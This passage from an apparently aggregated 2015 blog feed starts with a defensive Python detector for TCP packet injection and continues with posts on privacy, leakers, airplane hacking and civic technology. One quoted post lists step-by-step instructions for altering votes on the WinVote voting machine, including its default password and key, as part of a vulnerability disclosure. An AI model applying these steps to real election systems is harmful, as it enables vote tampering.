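        if not seg.payload:
            continue  # pure ACKs and handshake segments carry nothing to spoof
        variants = seen.setdefault(flow_key(seg), {})
        if seg.payload in variants:
            continue  # ordinary retransmission of bytes already seen
        if variants:
            prev = next(iter(variants.values()))  # first payload for this seq
            reasons = ["conflicting payloads for the same seq"]
            if abs(prev.ttl - seg.ttl) > ttl_slack:
                reasons.append(f"ttl {prev.ttl} vs {seg.ttl}")
            alerts.append(Alert(flow_key(seg), tuple(reasons), prev, seg))
        variants[seg.payload] = seg
    return alerts


def sample_capture() -> List[Segment]:
    """Constructed capture: request, injected reply, genuine reply, retransmit."""
    client, server = "10.0.0.5", "203.0.113.10"  # constructed addresses
    request = Segment(client, 51000, server, 80, 7000, True, True, 64,
                      b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
    genuine = Segment(server, 80, client, 51000, 1000, True, True, 52,
                      b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")
    # The injected copy reuses the swapped tuple and the expected seq, but its
    # bytes differ and its TTL reflects the shorter path from the vantage point.
    injected = Segment(server, 80, client, 51000, 1000, True, True, 58,
                       b"HTTP/1.1 302 Found\r\nLocation: http://redirect.invalid/\r\n\r\n")
    retransmit = genuine  # identical bytes: must not raise a second alert
    return [request, injected, genuine, retransmit]


if __name__ == "__main__":
    for alert in detect_injection(sample_capture()):
        print(f"ALERT {alert.key}: {'; '.join(alert.reasons)}")
```

The detector works only where the attacker's reply and the genuine reply both reach the observer; the defense the post argues for, end-to-end encryption, is what stops the injected bytes from being accepted in the first place.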

by Bruce Schneier at April 24, 2015 05:50 PM

Federal Trade Commissioner Julie Brill on Obscurity

I think this is good:

Obscurity means that personal information isn't readily available to just anyone. It doesn't mean that information is wiped out or even locked up; rather, it means that some combination of factors makes certain types of information relatively hard to find.

Obscurity has always been an important component of privacy. It is a helpful concept because it encapsulates how a broad range of social, economic, and technological changes affects norms and consumer expectations.

by Bruce Schneier at April 24, 2015 05:42 PM

Kate Krontiris
The Durham Residency This summer will see the launch of the...

The Durham Residency 

This summer will see the launch of the inaugural Durham Residency, a DIY week-long facilitated workshop for 6 creatives to develop individual projects, in a collaborative environment.

The experience will include individual working time, group feedback sessions, a final demo day, eating, playing, exploring the outdoors, and whatever else feeds inspiration and progress.

Please apply to the residency here.

What you bring:

  • A project to work on
  • The ability to make 1-2 meals for the group
  • A willingness to offer daily feedback to colleagues
  • A spirit of adventure and experimentation

What you get:

  • A beautiful place to work, lodge, and play for the week
  • A facilitated structure for individual work and collaborative feedback
  • All meals
  • Roundtrip transportation from Boston


$550 covers lodging, all meals, and a facilitated experience for the week.
We will be staying in a beautiful farmhouse in the Hudson Valley, NY.  

Who should apply?

We strongly encourage people from diverse backgrounds to apply.  Creativity comes in many different sizes, shapes, colors, experiences, and imaginations.  If you have a project and want to work on it seriously in the company of others, then this residency is for you.  Scholarship requests will be considered on an as-needed basis.

A flyer about the Durham Residency is available here.

You may apply to the residency here.

Applications are due by June 1, 2015.

April 24, 2015 04:24 PM

Willow Brugh
Humanitarian Technology Festival

I came on with Aspiration back in January as the Community Leadership Strategist, to merge the work I’ve been doing in the humanitarian and disaster response space with Aspiration’s practices and team. It’s been a *blast* so far, and continues to be.

Most of the work I’ve done in the last 5 years has been about what social justice looks like when we’re doing response, with a focus on technology (as that opens up paths to conversations we otherwise quit having). With Geeks Without Bounds, we did hackathons all over the world, including Random Hacks of Kindness and SpaceApps Challenge. I’ve been a coordinator for the Digital Humanitarian Network, keynoted the IEEE Global Humanitarian Technology Conference, was invited to the White House to talk about Sandy response, facilitated the first hackathon IN (not just for) Haiti, etc etc etc. I’ve also had a huge organizational crush on Aspiration since my first DevSummit in 2013, attending as many Aspiration-connected events as possible. When I was able to join Team Aspiration, I was overjoyed — even while much of the work I’ve continued to do on response had already existed, it’s been a slow shift to get those previously-defined objects to be a bit more Aspiration-shaped.

The Humanitarian Technology Festival in Cambridge May 9+10 is the first event that is both committed to response and framed on Aspiration ethos. I am SO EXCITED about this it hurts. Let me explain why.

The very way we deliver aid perpetuates the need for more aid, both for fast- and slow-onset disasters (or “extreme events” or “humanitarian issues” or “earthquake” or “famines” or whatever you’d like to say). When people need lodging after a hurricane, they’re either told to evacuate and/or they’re put into temporary homes, away from neighbors and family. There is little impetus to return and rebuild both social and tangible structures. People are uprooted, and must start from scratch. When, instead, we see that people don’t just need lodging but in fact need social fabric, responders (and the technologies used for response) can focus on how to maintain family and neighborhood ties. People are then less stressed as well as being more likely to take their own actions to return and rebuild.

For humanitarian aid, this is even more paternalistic and stratifying… while not actually “fixing” any of the things it aims to. Aid is primarily about making the giver feel better. But like Tom’s Shoes picking up on the “buy one, give one” idea that OLPC actually handled with cultural grace and systems thinking, instead Tom’s put some people out of work while trying to provide something THEY thought others needed. Even if it had been delivered in a less-jerky way, aid often ends up with locations dependent on that aid, rather than internally strengthened. This is one way we keep extracting resources out of other places without actually contributing to those locations. See also this bit of the paper I’m still working on. This allows the worst parts of globalization (erasure of cultures, consolidation of wealth, etc) to continue.

Some might say “fine, let them fend for themselves,” but that’s not ok either. When we don’t have to look at our neighbors (when we build walled housing complexes, or segregated schools), we can ignore how bad things are for them. And that’s also not an acceptable answer.

What we need are ways to listen to what people can offer, and what they need, under the assumptions that we are equals. This is why I’m so excited to see how the participatory methods I associate so strongly with Aspiration come to bear on this space. Just do a search-and-replace for “Nonprofits” to “Affected Communities” on our Manifesto and Participant Guidelines. People in these fragile situations are NOT a population to playtest new tools. Not only do failures have a larger impact in these spaces, but to think of another location and its people as “demo” space is undignified and unjust. We need better ways (not just better tools) for life EVERYWHERE, and to assume that we WEIRD (Western Educated Industrialized Rich Democratic)-o’s have all the answers is downright arrogant. By instead, as we do at Aspiration events, speaking to each other in easy-to-understand language, under the assumption that everyone is bringing something meaningful to the table, and that together we’ll figure it out; we can shift not only how we do response, but the after-effects of that response.

I’m especially excited to speak to people about distributed response, and how the tools we build for ourselves can be welcoming to others using them as well. Check out NYCprepared and Taarifa to see what this can look like.

by bl00 at April 24, 2015 01:17 PM

April 23, 2015

Bruce Schneier
An Incredibly Insecure Voting Machine


The weak passwords -- which are hard-coded and can't be changed -- were only one item on a long list of critical defects uncovered by the review. The Wi-Fi network the machines use is encrypted with wired equivalent privacy, an algorithm so weak that it takes as little as 10 minutes for attackers to break a network's encryption key. The shortcomings of WEP have been so well-known that it was banished in 2004 by the IEEE, the world's largest association of technical professionals. What's more, the WINVote runs a version of Windows XP Embedded that hasn't received a security patch since 2004, making it vulnerable to scores of known exploits that completely hijack the underlying machine. Making matters worse, the machine uses no firewall and exposes several important Internet ports.

It's the AVS WinVote touchscreen Direct Recording Electronic (DRE). The Virginia Information Technology Agency (VITA) investigated the machine, and found that you could hack this machine from across the street with a smart phone:

So how would someone use these vulnerabilities to change an election?

  1. Take your laptop to a polling place, and sit outside in the parking lot.
  2. Use a free sniffer to capture the traffic, and use that to figure out the WEP password (which VITA did for us).
  3. Connect to the voting machine over WiFi.
  4. If asked for a password, the administrator password is "admin" (VITA provided that).
  5. Download the Microsoft Access database using Windows Explorer.
  6. Use a free tool to extract the hardwired key ("shoup"), which VITA also did for us.
  7. Use Microsoft Access to add, delete, or change any of the votes in the database.
  8. Upload the modified copy of the Microsoft Access database back to the voting machine.
  9. Wait for the election results to be published.

Note that none of the above steps, with the possible exception of figuring out the WEP password, require any technical expertise. In fact, they're pretty much things that the average office worker does on a daily basis.


by Bruce Schneier at April 23, 2015 12:19 PM

April 22, 2015

Ivan Sigal
KCR Screening at the Fogg Museum
Sample of KCR multichannel installation

KCR appeared at Harvard’s Fogg Museum as a nine-channel interactive on April 20, 2015. It featured in the Lightbox Gallery, a space dedicated to digital installations in the new, Renzo Piano-designed addition to the museum. The installation was built in the programming language Processing, an open source project built to manage interactivity, nonlinearity, and graphic design. Coding help from Sands Fish and editing assistance from Robin Bell. Following is a sample clip of the installation:

Fogg Museum description: KCR, a documentary and installation project by Ivan Sigal, a fellow at Harvard’s Berkman Center for Internet & Society, traces the path of the defunct Karachi Circular Railway in Karachi, Pakistan, through a spatialized archive of video, stills, text, and drone aerial footage. Visitors will be able to talk with Sigal and learn more about digital collections and collections data.

by Ivan Sigal at April 22, 2015 07:08 PM

Bruce Schneier
Counting the US Intelligence Community Leakers

It's getting hard to keep track of the US intelligence community leakers without a scorecard. So here's my attempt:

  • Leaker #1: Chelsea Manning.

  • Leaker #2: Edward Snowden.

  • Leaker #3: The person who leaked secret documents to Jake Appelbaum, Laura Poitras, and others in Germany: the Angela Merkel surveillance story, the TAO catalog, the X-KEYSCORE rules. My guess is that this is either an NSA employee or contractor working in Germany, or someone from German intelligence who has access to NSA documents. Snowden has said that he is not the source for the Merkel story, and Greenwald has confirmed that the Snowden documents are not the source for the X-KEYSCORE rules. This might be the "high-ranking NSA employee in Germany" from this story -- or maybe that's someone else entirely.

  • Leaker #4: "A source in the intelligence community," according to the Intercept, who leaked information about the Terrorist Screening Database, the "second leaker" from the movie Citizenfour. Greenwald promises a lot from him: "Snowden, at a meeting with Greenwald in Moscow, expresses surprise at the level of information apparently coming from this new source. Greenwald, fearing he will be overheard, writes the details on scraps of paper." We have seen nothing since, though. This is probably the leaker the FBI identified, although we have heard nothing further about that, either.

  • Leaker #5: Someone who is leaking CIA documents.

  • Leaker #6: The person who leaked secret information about WTO spying to the Intercept and the New Zealand Herald. This isn't Snowden; the Intercept is very careful to identify him as the source when it writes about the documents he provided. Neither publication gives any indication of how it was obtained. This might be Leaker #3, since it contains X-KEYSCORE rules.

  • Leaker #7: The person who just leaked secret information about the US drone program to the Intercept and Der Spiegel. This also might be Leaker #3, since there is a Germany connection. According to the Intercept: "The slides were provided by a source with knowledge of the U.S. government's drone program who declined to be identified because of fears of retribution." That implies someone new.

Am I missing anyone?

Harvard Law School professor Yochai Benkler has written an excellent law review article on the need for a whistleblower defense. And there's this excellent article by David Pozen on why government leaks are, in general, a good thing. I wrote about the value of whistleblowers in Data and Goliath.

Way back in June 2013, Glenn Greenwald said that "courage is contagious." He seems to be correct.

This post was originally published on the Lawfare blog.

EDITED TO ADD (4/22): News article.

In retrospect, I shouldn't have included Manning in this list. I wanted it to be a list of active leaks, not historical leaks. And while Snowden is no longer leaking information, the reporters who received his documents are still releasing bits and pieces.

by Bruce Schneier at April 22, 2015 05:59 PM

Cyberlaw Clinic - blog
Clinic Files Amicus Brief on Free Speech Issue in Massachusetts

On Tuesday, the Cyberlaw Clinic filed an amicus brief (PDF) in the Supreme Judicial Court of Massachusetts on behalf of the New England First Amendment Coalition, Boston Globe Media Partners, LLC (owners of the Boston Globe), Hearst Television, Inc. (owners of WCVB-TV Channel 5 in Boston), the Massachusetts Newspaper Publishers Association, the New England Newspaper and Press Association, Inc., and the New England Society of Newspaper Editors in Commonwealth v. Lucas, SJC-11830. The case was brought under the Massachusetts false campaign speech law, M.G.L. ch. 56 § 42 (“Section 42”). The defendant in the case, a treasurer with a political action committee that sent a mailer in the 2014 state election, challenged the constitutionality of the statute under the First Amendment and Article 16 of the Massachusetts Declaration of Rights.

The brief argues that Section 42 is an unconstitutional restriction on the content of speech, and is also unconstitutionally vague. The brief describes the robust protection for speech in the realm of political debate, and notes several cases in other jurisdictions where courts struck false campaign speech statutes. As those cases note, counterspeech by political opponents is the preferred way to remedy misleading political speech, and statutes that criminalize false speech for the sake of protecting listeners are usually instead used as tools to extract partisan revenge by filing frivolous criminal complaints.

As the brief notes, Section 42 presents more serious concerns than the statutes in those cases, as it criminalizes the making or publishing of “any false statement in relation to any candidate for nomination or election to public office, which is designed or tends to aid or to injure or defeat such candidate.” Thus, Section 42, “potentially ascribes liability to publishers of third-party information, even when the public well understands that they are not the originators of that speech.” The statute could also criminalize statements that are technically false but are not misleading or fraudulent, including rhetorical hyperbole, satire, false statements published in the process of debunking them, or statements made in covering both sides of a controversial story.

The case is scheduled for argument on Thursday, May 7th, at the John Adams Courthouse in Boston. Special thanks to HLS Cyberlaw Clinic students Catherine Essig (’16), Naomi Gilens (’16), and D. Patrick Knoth (’16), who worked closely with Andy Sellars and Chris Bavitz, along with amici, to prepare and file the brief.

by Clinic Staff at April 22, 2015 03:08 PM

Bruce Schneier
Hacker Detained by FBI after Tweeting about Airplane Software Vulnerabilities

This is troubling:

Chris Roberts was detained by FBI agents on Wednesday as he was deplaning his United flight, which had just flown from Denver to Syracuse, New York. While on board the flight, he tweeted a joke about taking control of the plane's engine-indicating and crew-alerting system, which provides flight crews with information in real-time about an aircraft's functions, including temperatures of various equipment, fuel flow and quantity, and oil pressure. In the tweet, Roberts jested: "Find myself on a 737/800, lets see Box-IFE-ICE-SATCOM, ? Shall we start playing with EICAS messages? 'PASS OXYGEN ON' Anyone ? :)" FBI agents questioned Roberts for four hours and confiscated his iPad, MacBook Pro, and storage devices.

Yes, the real issue here is the chilling effect on security research. Security researchers who point out security flaws are doing a good thing, and should be encouraged.

But to me, the fascinating part of this story is that a computer was monitoring the Twitter feed and understood the obscure references, alerted a person who figured out who wrote them, researched what flight he was on, and sent an FBI team to the Syracuse airport within a couple of hours. There's some serious surveillance going on.

Now, it is possible that Roberts was being specifically monitored. He is already known as a security researcher who is working on avionics hacking. But still...

Slashdot thread. Hacker News thread.

EDITED TO ADD (4/22): Another article, this one about the debate over disclosing security vulnerabilities.

by Bruce Schneier at April 22, 2015 01:51 PM

"Hinky" in Action

In Beyond Fear I wrote about trained officials recognizing "hinky" and how it differs from profiling:

Ressam had to clear customs before boarding the ferry. He had fake ID, in the name of Benni Antoine Noris, and the computer cleared him based on this ID. He was allowed to go through after a routine check of his car's trunk, even though he was wanted by the Canadian police. On the other side of the Strait of Juan de Fuca, at Port Angeles, Washington, Ressam was approached by U.S. customs agent Diana Dean, who asked some routine questions and then decided that he looked suspicious. He was fidgeting, sweaty, and jittery. He avoided eye contact. In Dean's own words, he was acting "hinky." More questioning -- there was no one else crossing the border, so two other agents got involved -- and more hinky behavior. Ressam's car was eventually searched, and he was finally discovered and captured. It wasn't any one thing that tipped Dean off; it was everything encompassed in the slang term "hinky." But the system worked. The reason there wasn't a bombing at LAX around Christmas in 1999 was because a knowledgeable person was in charge of security and paying attention.

I wrote about this again in 2007:

The key difference is expertise. People trained to be alert for something hinky will do much better than any profiler, but people who have no idea what to look for will do no better than random.

Here's another story from last year:

On April 28, 2014, Yusuf showed up alone at the Minneapolis Passport Agency and applied for an expedited passport. He wanted to go "sightseeing" in Istanbul, where he was planning to meet someone he recently connected with on Facebook, he allegedly told the passport specialist.

"It's a guy, just a friend," he told the specialist, according to court documents.

But when the specialist pressed him for more information about his "friend" in Istanbul and his plans while there, Yusuf couldn't offer any details, the documents allege.

"[He] became visibly nervous, more soft-spoken, and began to avoid eye contact," the documents say. "Yusuf did not appear excited or happy to be traveling to Turkey for vacation."

In fact, the passport specialist "found his interaction with Yusuf so unusual that he contacted his supervisor who, in turn, alerted the FBI to Yusuf's travel," according to the court documents.

This is what works. Not profiling. Not bulk surveillance. Not defending against any particular tactics or targets. In the end, this is what keeps us safe.

by Bruce Schneier at April 22, 2015 01:40 PM

David Weinberger

I registered to keep it out of the hands of those who do not support her. For $13, why not?

I suppose I should have registered just for the sake of symmetry.

The post appeared first on Joho the Blog.

by davidw at April 22, 2015 12:31 PM

Ethan Zuckerman
Introducing FOLD, a new tool (and a new model?) for storytelling

This morning, Center for Civic Media at MIT is releasing a new publishing platform, FOLD. Alexis Hope (a Masters student in my lab) and Kevin Hu began working on FOLD when they were students in my class News and Participatory Media. The class asks students to take on a reporting task each week, using existing tools or building new ones to solve a particular challenge. FOLD was Alexis and Kevin’s solution to a challenge I put forward around writing “explainers”, articles designed to provide content for stories that give incremental updates to a larger story (and to develop an appetite for those stories based on deeper understanding of their significance.)

Alexis and Kevin took seriously an idea I put forward in the class – the idea of explainers with an accordion structure, capable of shrinking or expanding to meet a reader’s need for background information. Alexis and Kevin built a story that could compress into a list of half a dozen sentences, inflate to a six-paragraph essay, or expand further into a rich multimedia essay with maps, images and videos appearing alongside the text. The class loved the idea, and Alexis decided to take on developing the platform as her Masters thesis. Kevin continued collaborating with her while pursuing a different project for his thesis, and Joe Goldbeck joined the team as a lead developer.

FOLD Authoring preview from Alexis Hope on Vimeo.

What’s emerged after a year’s work is a fascinating and full-featured tool that allows for a novel method of storytelling. Stories on FOLD have a trunk and leaves. The trunk is text, with a novel form of hyperlinks – instead of linking out, they link to cards that appear to the right of the trunk and show images, videos, maps, data visualizations. They can also contain other text or links to the web. This has the effect of encouraging massive linking within stories – rather than a link potentially leading someone away from your webpage, it builds a stronger and richer story on the site.

While I’ve had the pleasure of advising Alexis on her thesis, FOLD is emphatically not my project – had you asked me a year ago, I would have told you that the last thing the world needs is a new content management system. But it’s been fascinating to try writing on FOLD and discovering the ways in which it’s a tool I’ve wanted and needed for years. I often write posts with hyperlinks every other sentence and trust my readers to check those links to understand the whole story… while realizing, of course, that very few do. FOLD brings those references to the front, capturing some of your attention in your peripheral vision as you read the core, trunk text. It’s incredibly easy to add media to a story in FOLD, and I find that when I write on the platform, I’m far more likely to include rich imagery and video, which makes my stories visualizable and understandable in a very different way than blog posts.

Alexis, Kevin and Joe are launching FOLD without a clear business model. I think that’s a good thing. I don’t think we know what FOLD is good for yet, and I think that’s exciting. It’s possible that FOLD becomes an alternative to platforms like Medium, a place that encourages people to write beautifully on a beautiful platform. Perhaps it becomes something like WordPress, which hosts content for millions of people as well as maintaining an incredibly robust platform for independent publishers. (Not only are we releasing FOLD as a platform, but as an open source codebase.) Maybe it’s a tool for a radically new form of writing, perhaps stronger for literary than journalistic writing. Maybe some of the ideas of the platform are adopted into other systems and the influence of Alexis, Kevin and Joe’s thinking spreads that way. We don’t know, and that’s exciting.

For me, personally, I’ve loved the experience of seeing something cool and potentially influential coming out of our lab that wasn’t my idea and which I’ve helped guide, but emphatically haven’t built. This feels like a shift in how I’m trying to work in the world, and one I’m starting to get comfortable with.

Like many people of my generation, I’ve changed jobs several times in the past twenty years. Rather than switching firms, I’ve also shifted careers, moving from a dotcom startup to founding an international volunteering agency, to academic research (and co-founding another NGO) and finally, at age 39, to teaching at the graduate level at MIT.

When you change careers, some skills transfer, and some don’t. The shift from research to teaching was far sharper than I’d expected. There’s an unkind saying, “Those who can’t do, teach.” I’d offer a rewrite: “Teaching well forces you to stop doing things, and focus on helping others do things.” I build less, and write less, than before I came to MIT. But I coach more, listen more, and I’m starting to love the experience of watching projects I help advise coming to life.

Glyph from Savannah Niles’s story about Cuba

One of the most beautiful stories I’ve seen produced with FOLD is “What You Need to Know About the Cuban Thaw”, written by Savannah Niles (also for my News and Participatory Media class.) The story is illustrated with animated, looping GIFs, produced with a tool Savannah has been building for her thesis called Glyph. I’m one of the readers on Savannah’s thesis, and while I’ve thought these images were very beautiful, I didn’t understand what they were for until I saw them in this story. They add a sense of motion and life to stories without interrupting the reading experience as videos end up doing. This experience of supporting work I don’t understand and then discovering why it’s important – with Glyph, with FOLD, with dozens of projects around the Media Lab and in my broader work on Civic Media – is one of the most exciting experiences of my career.

I hope you’ll give FOLD a try and help us figure out what it’s for. Let us know what works, what doesn’t, what you want and where you think the project should go.

by Ethan at April 22, 2015 12:00 PM

April 21, 2015

Bruce Schneier
Hacking Airplanes

Imagine this: A terrorist hacks into a commercial airplane from the ground, takes over the controls from the pilots and flies the plane into the ground. It sounds like the plot of some "Die Hard" reboot, but it's actually one of the possible scenarios outlined in a new Government Accountability Office report on security vulnerabilities in modern airplanes.

It's certainly possible, but in the scheme of Internet risks I worry about, it's not very high. I'm more worried about the more pedestrian attacks against more common Internet-connected devices. I'm more worried, for example, about a multination cyber arms race that stockpiles capabilities such as this, and prioritizes attack over defense in an effort to gain relative advantage. I worry about the democratization of cyberattack techniques, and who might have the capabilities currently reserved for nation-states. And I worry about a future a decade from now if these problems aren't addressed.

First, the airplanes. The problem the GAO identifies is one computer security experts have talked about for years. Newer planes such as the Boeing 787 Dreamliner and the Airbus A350 and A380 have a single network that is used both by pilots to fly the plane and passengers for their Wi-Fi connections. The risk is that a hacker sitting in the back of the plane, or even one on the ground, could use the Wi-Fi connection to hack into the avionics and then remotely fly the plane.

The report doesn't explain how someone could do this, and there are currently no known vulnerabilities that a hacker could exploit. But all systems are vulnerable--we simply don't have the engineering expertise to design and build perfectly secure computers and networks--so of course we believe this kind of attack is theoretically possible.

Previous planes had separate networks, which is much more secure.

As terrifying as this movie-plot threat is--and it has been the plot of several recent works of fiction--this is just one example of an increasingly critical problem: As the computers already critical to running our infrastructure become connected, our vulnerability to cyberattack grows. We've already seen vulnerabilities in baby monitors, cars, medical equipment and all sorts of other Internet-connected devices. In February, Toyota recalled 1.9 million Prius cars because of a software vulnerability. Expect similar vulnerabilities in our smart thermostats, smart light bulbs and everything else connected to the smart power grid. The Internet of Things will bring computers into every aspect of our life and society. Those computers will be on the network and will be vulnerable to attack.

And because they'll all be networked together, a vulnerability in one device will affect the security of everything else. Right now, a vulnerability in your home router can compromise the security of your entire home network. A vulnerability in your Internet-enabled refrigerator can reportedly be used as a launching pad for further attacks.

Future attacks will be exactly like what's happening on the Internet today with your computer and smartphones, only they will be with everything. It's all one network, and it's all critical infrastructure.

Some of these attacks will require sufficient budget and organization to limit them to nation-state aggressors. But that's hardly comforting. North Korea is believed to have launched a massive cyberattack against Sony Pictures last year. Last month, China used a cyberweapon called the "Great Cannon" against the website GitHub. In 2010, the U.S. and Israeli governments launched a sophisticated cyberweapon called Stuxnet against the Iranian Natanz nuclear power plant; it used a series of vulnerabilities to cripple centrifuges critical for separating nuclear material. In fact, the United States has done more to weaponize the Internet than any other country.

Governments only have a fleeting advantage over everyone else, though. Today's top-secret National Security Agency programs become tomorrow's Ph.D. theses and the next day's hacker tools. So while remotely hacking the 787 Dreamliner's avionics might be well beyond the capabilities of anyone except Boeing engineers today, that's not going to be true forever.

What this all means is that we have to start thinking about the security of the Internet of Things--whether the issue in question is today's airplanes or tomorrow's smart clothing. We can't repeat the mistakes of the early days of the PC and then the Internet, where we initially ignored security and then spent years playing catch-up. We have to build security into everything that is going to be connected to the Internet.

This is going to require both significant research and major commitments by companies. It's also going to require legislation mandating certain levels of security on devices connecting to the Internet, and at network providers that make the Internet work. This isn't something the market can solve on its own, because there are just too many incentives to ignore security and hope that someone else will solve it.

As a nation, we need to prioritize defense over offense. Right now, the NSA and U.S. Cyber Command have a strong interest in keeping the Internet insecure so they can better eavesdrop on and attack our enemies. But this prioritization cuts both ways: We can't leave others' networks vulnerable without also leaving our own vulnerable. And as one of the most networked countries on the planet, we are highly vulnerable to attack. It would be better to focus the NSA's mission on defense and harden our infrastructure against attack.

Remember the GAO's nightmare scenario: A hacker on the ground exploits a vulnerability in the airplane's Wi-Fi system to gain access to the airplane's network. Then he exploits a vulnerability in the firewall that separates the passengers' network from the avionics to gain access to the flight controls. Then he uses other vulnerabilities both to lock the pilots out of the cockpit controls and take control of the plane himself.

It's a scenario made possible by insecure computers and insecure networks. And while it might take a government-led secret project on the order of Stuxnet to pull it off today, that won't always be true.

Of course, this particular movie-plot threat might never become a real one. But it is almost certain that some equally unlikely scenario will. I just hope we have enough security expertise to deal with whatever it ends up being.

This essay originally appeared on

EDITED TO ADD: News articles.

by Bruce Schneier at April 21, 2015 06:40 PM

Producer Spotlight: Conor Gillies of Stylus

Each month we’ll be highlighting a different PRX producer to find out what they’re working on and hear about the challenges they face as indies as well as the stuff that gets them stoked.

How long have you been using PRX?
Been using it for three years or so.

What are you working on right now?
Producing a weekly show and podcast for Radio Open Source and working on a couple new podcast pilots, too. Trying to get Stylus on the airwaves, as always.

Can you tell us more about your show, Stylus?
Stylus is a radio series about big ideas in sound, music, and listening. It started when my coproducer Zack and I and a cadre of people in and around WBUR pitched the show and produced a pilot, which led to the station funding us for a four-episode first season: “Silence,” “Seeing and Illustrating Music,” “Songs of the Earth,” and “The Sound of Science Fiction.” It’s a kind of left-field, non-narrated documentary show for music people and art fans, but also anyone who’s interested in the links between sound, place, history, and society.

What is your biggest challenge with that project?
Finding new listeners through the Internet. Of course, everyone doing community radio or longform audio faces that challenge—largely because social media isn’t designed for sound or not-for-profit content. But also I’m just bad at tweets. [Editor’s note: aren’t we all, Conor.]

What are you most excited about in public radio or podcasting?
For shows, I’m excited about Reveal. I hope it gives old-school muckraking a shot in the arm. Wicked excited Scott Carrier is podcasting. Also, I’m excited about the serial format generally. I’m listening out for the big return of radio drama.

Want to learn more? Sam Greenspan of 99% Invisible wrote a nice little thang about Stylus and the first episode, Silence, was featured on HowSound.

The post Producer Spotlight: Conor Gillies of Stylus appeared first on PRX.

by Audrey at April 21, 2015 06:07 PM

Cyberlaw Clinic - blog
Interdisciplinarity and Impact at the Berkman Center

I wrote a guest post over at the HLS Admissions Office blog, highlighting just some of the great programs and initiatives going on at the Berkman Center for Internet & Society. Separate and apart from the Cyberlaw Clinic (which is based at Berkman), the Center’s research staff, core team, Geeks, and Fellows community do extraordinary work on all manner of issues relating to technology and the Internet. The post follows a great piece at “Harvard Law Today,” focusing more broadly on resources and programming for those interested in innovation, technology, and entrepreneurship at HLS and around the University.

by Christopher Bavitz at April 21, 2015 03:03 PM

Berkman Center front page
Berkman Buzz: April 21, 2015


The failure of, smarter machines at work, "security theater" and more... in this week's Buzz.


The Berkman Buzz is a weekly collection of work, conversations, and news from around the Berkman community.

Berkman Center and Cyberlaw Clinic to Support MIT Media Lab's Digital Currency Initiative

We at the Berkman Center for Internet & Society - and, in particular, here at the Cyberlaw Clinic - are thrilled to share today's announcement from our friends and frequent collaborators at the MIT Media Lab of the Lab's new Digital Currency Initiative. MIT has been a leader on both the study and implementation of bitcoin-based systems, with the MIT Bitcoin Club bringing students and others together to think about the development of bitcoin-platforms and the MIT Bitcoin Project putting virtual currency in the virtual hands of students in an effort to generate interest in emerging payment systems. We are ecstatic to see the Media Lab put its weight behind research on and facilitation of blockchain-based technologies and welcome the effort to formalize its role as a neutral hub and convening force on the topic of digital currency.

From the blog post, "Berkman Center and Cyberlaw Clinic to Support MIT Media Lab's Digital Currency Initiative"
About the Cyberlaw Clinic | @cyberlawclinic

Doc Searls argues is a failed exercise in misdirection


The Internet is one thing. It is comprised of everything it connects. By nature it is as neutral as gravity. It favors nothing and is not partial to anything. Yes, there are exceptions to that rule, in the way Net access is provisioned, but the basic nature of the Net - as a free, open and neutral shared space in the world - is by now obvious to pretty much everybody who doesn't have an interest in limiting it in some way.

This is why Facebook's is pure misdirection: a partial private fraction masked as a complete public whole. And also why it's in trouble. The misdirection isn't working.

From his blog post, " is a failed exercise in misdirection"
About Doc | @dsearls

Zeynep Tufecki considers technology, power and labor


Machines aren't used because they perform some tasks that much better than humans, but because, in many cases, they do a "good enough" job while also being cheaper, more predictable and easier to control than quirky, pesky humans. Technology in the workplace is as much about power and control as it is about productivity and efficiency.

From her New York Times piece, "The Machines Are Coming"
About Zeynep | @zeynep

Shoshana Zuboff examines the "sharing economy"


Are Germany and Europe behind the curve in digital disruption? Earlier this year Volkmar Denner, the CEO of Bosch, told the Financial Times: "Uber is not a revolutionary technology, it's a business model innovation - and there we are not good enough yet...That's where I see the biggest threat." There's also been quite a lot of material coming out of the European Commission and other sources on the need for more digital disruption in Europe. Is Mr. Denner correct? Should Germany and Europe imitate the Uber model? Is it a model that will drive economic history? Will it make our societies more prosperous? More democratic?

From her article, "Disruption's Tragic Flaw"
About Shoshana | @shoshanazuboff

Bruce Schneier on "security theater"


Fans attending Major League Baseball games are being greeted in a new way this year: with metal detectors at the ballparks. Touted as a counterterrorism measure, they're nothing of the sort. They're pure security theater: They look good without doing anything to make us safer. We're stuck with them because of a combination of buck passing, CYA thinking and fear.

From his Washington Post article, "Baseball's new metal detectors won't keep you safe. They'll just make you miss a few innings."
About Bruce | @schneierblog

Leora Kornfeld explores PBS's move to YouTube


The trade-off here is this: sacrificing the owned and operated PBS platform for access to YouTube's 1 billion+ monthly users. The costs? Well, for starters, YouTube takes 45% of the ad revenue, but they're the elephant in the room, and as such they can take (close to) the lion's share of the revenue. And apologies for the mixing of animal metaphors but I couldn't resist.

The other beast in the room is Facebook, where YouTube video is commonly shared. It's responsible for about 25% of all traffic referred online.

From her blog post, "Why PBS moved from 'owned & operated' media to YouTube"
About Leora | @ellerybiddle

How Blogging is Held Hostage by Ethiopian Politics


The control exerted by the state over Ethiopia's telecommunications services is usually justified in the name of preserving Ethiopia's economic sovereignty. To a large extent, Ethiopia exploits its position as western powers' stable ally in the volatile Horn of Africa. Bordered by Sudan and Eritrea, and with a genuine terror threat emanating from neighboring Somalia, the government can use sweeping and abusive anti-terrorism laws as a tool to suppress any hint of dissent.

From Global Voices | @globalvoices

More Berkman in the News

by gweber at April 21, 2015 02:37 PM

Classes of defense for computer systems


with Berkman Fellow, Josephine Wolff


Drawing on case studies of actual security incidents, as well as the past decade of security incident data at MIT, this talk will analyze security roles and defense design patterns for application designers, administrators, and policy-makers.

Parent Event

Berkman Luncheon Series

Event Date

Apr 21 2015 12:00pm to Apr 21 2015 12:00pm

Tuesday, April 21, 2015 at 12:00 pm

There is no silver bullet for defending computer systems. Strengthening security means negotiating a balance among a variety of defenses that fall into several different categories and rely on the cooperation and support of many different actors, including technologists, managers, and policy-makers. Therefore, one crucial element of security involves understanding the multiplicity of defenses and the ways they can be combined and recombined to protect systems. Yet, there is no clear model of how different classes of computer system defense relate to classes of attack, or what defensive functions are best suited to technical, policy, or managerial interventions. Drawing on case studies of actual security incidents, as well as the past decade of security incident data at MIT, this talk will analyze security roles and defense design patterns for application designers, administrators, and policy-makers. It will also discuss the interplay between defenses designed to limit access to computer systems and those oriented towards limiting and mitigating the resulting damage.

About Josephine

